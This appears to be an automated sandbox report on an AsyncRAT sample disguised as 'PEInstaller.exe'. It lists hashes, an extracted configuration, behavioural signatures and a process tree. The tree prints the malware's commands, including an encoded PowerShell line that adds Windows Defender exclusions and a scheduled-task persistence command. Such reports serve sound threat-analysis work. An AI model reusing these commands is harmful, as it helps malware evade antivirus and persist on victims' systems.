Analysis
-
max time kernel
39s -
max time network
35s -
platform
windows10-ltsc_2021_x64 -
resource
win10ltsc2021-20250410-en -
resource tags
arch:x64arch:x86image:win10ltsc2021-20250410-enlocale:en-usos:windows10-ltsc_2021-x64system -
submitted
19/04/2025, 23:41
Static task
static1
Behavioral task
behavioral1
Sample
PEInstaller.exe
Resource
win10ltsc2021-20250410-en
General
-
Target
PEInstaller.exe
-
Size
54KB
-
MD5
e9dd08c82ee9543ed88a2df140be3162
-
SHA1
6950038c06707e4c6e4313bb59c30deae6f93ee4
-
SHA256
a2bcd0666901803cb37a0247a2a46b9e71b10969805b9154bfd07a46bce369b9
-
SHA512
078352b36ea8595f5ad293d7b04cd7d5b61bccfa11ddd83a10c6f41946815000398b7e2be1257b946eb75ceb9055c20a6975bbb577eb3d7a2407de4028bd8708
-
SSDEEP
1536:kpppNJkBOQEZcYx3dup+FFc2PlG1tMroSa5VghzsG:kzpkIQERMp+Tc2PlG12e
Malware Config
Extracted
asyncrat
0.5.8
Default
127.0.0.1:6606
127.0.0.1:7707
127.0.0.1:8808
127.0.0.1:2009
jc1XWfeoz50P
-
delay
10
-
install
true
-
install_file
executor.exe
-
install_folder
%Temp%
Signatures
-
Asyncrat family
-
Async RAT payload 1 IoCs
resource yara_rule behavioral1/files/0x000a000000025d2f-4.dat family_asyncrat -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-4097046113-3950943903-3587629992-1000\Control Panel\International\Geo\Nation PEInstaller.exe Key value queried \REGISTRY\USER\S-1-5-21-4097046113-3950943903-3587629992-1000\Control Panel\International\Geo\Nation PEInstaller.exe -
Executes dropped EXE 2 IoCs
pid Process 5492 PEInstaller.exe 2492 executor.exe -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 9 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PEInstaller.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PEInstaller.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language executor.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 1832 timeout.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3780 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 25 IoCs
pid Process 3308 powershell.exe 2848 powershell.exe 3308 powershell.exe 2848 powershell.exe 5492 PEInstaller.exe 5492 PEInstaller.exe 5492 PEInstaller.exe 5492 PEInstaller.exe 5492 PEInstaller.exe 5492 PEInstaller.exe 5492 PEInstaller.exe 5492 PEInstaller.exe 5492 PEInstaller.exe 5492 PEInstaller.exe 5492 PEInstaller.exe 5492 PEInstaller.exe 5492 PEInstaller.exe 5492 PEInstaller.exe 5492 PEInstaller.exe 5492 PEInstaller.exe 5492 PEInstaller.exe 5492 PEInstaller.exe 5492 PEInstaller.exe 5492 PEInstaller.exe 5492 PEInstaller.exe -
Suspicious use of AdjustPrivilegeToken 26 IoCs
description pid Process Token: SeDebugPrivilege 3308 powershell.exe Token: SeDebugPrivilege 2848 powershell.exe Token: SeIncreaseQuotaPrivilege 3308 powershell.exe Token: SeSecurityPrivilege 3308 powershell.exe Token: SeTakeOwnershipPrivilege 3308 powershell.exe Token: SeLoadDriverPrivilege 3308 powershell.exe Token: SeSystemProfilePrivilege 3308 powershell.exe Token: SeSystemtimePrivilege 3308 powershell.exe Token: SeProfSingleProcessPrivilege 3308 powershell.exe Token: SeIncBasePriorityPrivilege 3308 powershell.exe Token: SeCreatePagefilePrivilege 3308 powershell.exe Token: SeBackupPrivilege 3308 powershell.exe Token: SeRestorePrivilege 3308 powershell.exe Token: SeShutdownPrivilege 3308 powershell.exe Token: SeDebugPrivilege 3308 powershell.exe Token: SeSystemEnvironmentPrivilege 3308 powershell.exe Token: SeRemoteShutdownPrivilege 3308 powershell.exe Token: SeUndockPrivilege 3308 powershell.exe Token: SeManageVolumePrivilege 3308 powershell.exe Token: 33 3308 powershell.exe Token: 34 3308 powershell.exe Token: 35 3308 powershell.exe Token: 36 3308 powershell.exe Token: SeDebugPrivilege 5492 PEInstaller.exe Token: SeDebugPrivilege 2492 executor.exe Token: SeDebugPrivilege 2492 executor.exe -
Suspicious use of WriteProcessMemory 24 IoCs
description pid Process procid_target PID 1652 wrote to memory of 2848 1652 PEInstaller.exe 82 PID 1652 wrote to memory of 2848 1652 PEInstaller.exe 82 PID 1652 wrote to memory of 2848 1652 PEInstaller.exe 82 PID 1652 wrote to memory of 3308 1652 PEInstaller.exe 84 PID 1652 wrote to memory of 3308 1652 PEInstaller.exe 84 PID 1652 wrote to memory of 3308 1652 PEInstaller.exe 84 PID 1652 wrote to memory of 5492 1652 PEInstaller.exe 86 PID 1652 wrote to memory of 5492 1652 PEInstaller.exe 86 PID 1652 wrote to memory of 5492 1652 PEInstaller.exe 86 PID 5492 wrote to memory of 3460 5492 PEInstaller.exe 92 PID 5492 wrote to memory of 3460 5492 PEInstaller.exe 92 PID 5492 wrote to memory of 3460 5492 PEInstaller.exe 92 PID 5492 wrote to memory of 3880 5492 PEInstaller.exe 94 PID 5492 wrote to memory of 3880 5492 PEInstaller.exe 94 PID 5492 wrote to memory of 3880 5492 PEInstaller.exe 94 PID 3880 wrote to memory of 1832 3880 cmd.exe 96 PID 3880 wrote to memory of 1832 3880 cmd.exe 96 PID 3880 wrote to memory of 1832 3880 cmd.exe 96 PID 3460 wrote to memory of 3780 3460 cmd.exe 97 PID 3460 wrote to memory of 3780 3460 cmd.exe 97 PID 3460 wrote to memory of 3780 3460 cmd.exe 97 PID 3880 wrote to memory of 2492 3880 cmd.exe 99 PID 3880 wrote to memory of 2492 3880 cmd.exe 99 PID 3880 wrote to memory of 2492 3880 cmd.exe 99
Processes
-
C:\Users\Admin\AppData\Local\Temp\PEInstaller.exe"C:\Users\Admin\AppData\Local\Temp\PEInstaller.exe"1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1652 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGMAcQBsACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAG0AZABkACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAVABoAGUAcgBlACAAdwBhAHMAIABhAG4AIABlAHIAcgBvAHIAIABlAHgAZQBjAHUAdABpAG4AZwAgAHQAaABpAHMAIABwAHIAbwBnAHIAYQBtAC4AIABDAG8AbgB0AGEAYwB0ACAAdABoAGUAIABhAHUAdABoAG8AcgAgAGYAbwByACAAbQBvAHIAZQAgAGkAbgBmAG8AcgBtAGEAdABpAG8AbgAuACcALAAnACcALAAnAE8ASwAnACwAJwBFAHIAcgBvAHIAJwApADwAIwBrAHkAagAjAD4A"2⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2848
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHAAdQBkACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAeQByACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHAAbAB1ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAZgBqACMAPgA="2⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3308
-
-
C:\Users\Admin\AppData\Roaming\PEInstaller.exe"C:\Users\Admin\AppData\Roaming\PEInstaller.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5492 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "executor" /tr '"C:\Users\Admin\AppData\Local\Temp\executor.exe"' & exit3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3460 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "executor" /tr '"C:\Users\Admin\AppData\Local\Temp\executor.exe"'4⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:3780
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpAC2E.tmp.bat""3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3880 -
C:\Windows\SysWOW64\timeout.exetimeout 34⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:1832
-
-
C:\Users\Admin\AppData\Local\Temp\executor.exe"C:\Users\Admin\AppData\Local\Temp\executor.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2492
-
-
-
Network
MITRE ATT&CK Enterprise v16
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5f9349064c7c8f8467cc12d78a462e5f9
SHA15e1d27fc64751cd8c0e9448ee47741da588b3484
SHA256883481fe331cb89fb6061e76b43acd4dd638c16f499b10088b261036c6d0547b
SHA5123229668491b5e4068e743b31f2896b30b1842faf96aff09fad01b08771c2f11eb8d8f02a3b76e31f0d6ad650c2894c5ac1822204e132c03d9c2b8df6ca4cd7cf
-
Filesize
17KB
MD5e47ee458b01ab35586168c0d5f92a333
SHA138f466a5bf62a936118989034a87f55d2a538a2e
SHA2568807a2f60766cfda381c06541848f54d21ea60c1fab23102f5595abc70669ab8
SHA512a48fee62335af3be16581adde914d308f987d5d0cd0580396d8c230274903277d84311c5b17fd682427aadbf2df2803b39e9c50fdfbb13e1f06d3607e7638dbb
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
155B
MD515b2e025bd2e0c3bb7cdfc4151e91025
SHA189e2dfe263881f9482113416434686d45700d4bf
SHA256e25071f150e1bd4f1f2141ab26171d94dd45661fa7cb717b76bb974b33b8c8a2
SHA5120af0f8b39da3864ebc4838c9cbb468df7969af7c6eb80abf169295df3aeb666e5210780022b752e61b8ad4392b45d2d39fd3be9bbc7bae73c78e4b4489647c92
-
Filesize
48KB
MD5a96ef57452d73871dc1045b96fddcf96
SHA17a9b28306b0fc32d4281b756be5bc91f53234696
SHA2562fd4684b115a4b607493596b7fba4d54ddc7d97aec1852fbd60d449f353c2902
SHA51214db2977907baa98fe81f66fc0b44d360bee92d8b5e53527021fd9ef5f182e3aaa30e5e05ef95b0eac3d09b21074e89dee42c59d8a23b91a3dfa0c4871c3cd8e